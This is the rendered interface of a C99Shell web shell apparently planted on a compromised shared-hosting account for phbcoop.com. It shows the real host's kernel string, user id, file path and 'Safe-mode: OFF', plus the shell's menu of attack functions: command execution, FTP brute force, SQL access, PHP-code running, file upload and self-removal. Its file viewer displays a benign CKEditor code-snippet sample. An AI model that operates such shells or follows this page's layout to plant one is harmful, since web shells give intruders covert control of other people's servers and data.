!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/phbcoop.com/phb_admin/bower_components/ckeditor/samples/old/codesnippet/   drwxr-xr-x
Free 236.5 GB of 981.82 GB (24.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     codesnippet.html (7.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Code Snippet — CKEditor Sample

CKEditor Samples » Code Snippet Plugin

This sample is not maintained anymore. Check out its brand new version in CKEditor SDK.

This editor is using the Code Snippet plugin which introduces beautiful code snippets. By default the codesnippet plugin depends on the built-in client-side syntax highlighting library highlight.js.

You can adjust the appearance of code snippets using the codeSnippet_theme configuration variable (see available themes).

Select theme:

The CKEditor instance below was created by using the following configuration settings:

CKEDITOR.replace( 'editor1', {
	extraPlugins: 'codesnippet',
	codeSnippet_theme: 'monokai_sublime'
} );

Please note that this plugin is not compatible with Internet Explorer 8.

Inline editor

The following sample shows the Code Snippet plugin running inside an inline CKEditor instance. The CKEditor instance below was created by using the following configuration settings:

CKEDITOR.inline( 'editable', {
	extraPlugins: 'codesnippet'
} );

Note: The highlight.js themes must be loaded manually to be applied inside an inline editor instance, as the codeSnippet_theme setting will not work in that case. You need to include the stylesheet in the <head> section of the page, for example:

<head>
	...
	<link href="path/to/highlight.js/styles/monokai_sublime.css" rel="stylesheet">
</head>

JavaScript code:

function isEmpty( object ) {
	for ( var i in object ) {
		if ( object.hasOwnProperty( i ) )
			return false;
	}
	return true;
}

SQL query:

SELECT cust.id, cust.name, loc.city FROM cust LEFT JOIN loc ON ( cust.loc_id = loc.id ) WHERE cust.type IN ( 1, 2 );

Unknown markup:

 ________________
/                \
| How about moo? |  ^__^
\________________/  (oo)\_______
                  \ (__)\       )\/\
                        ||----w |
                        ||     ||

Server-side Highlighting and Custom Highlighting Engines

The Code Snippet GeSHi plugin is an extension of the Code Snippet plugin which uses a server-side highligter.

It also is possible to replace the default highlighter with any library using the Highlighter API and the editor.plugins.codesnippet.setHighlighter() method.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0876 ]--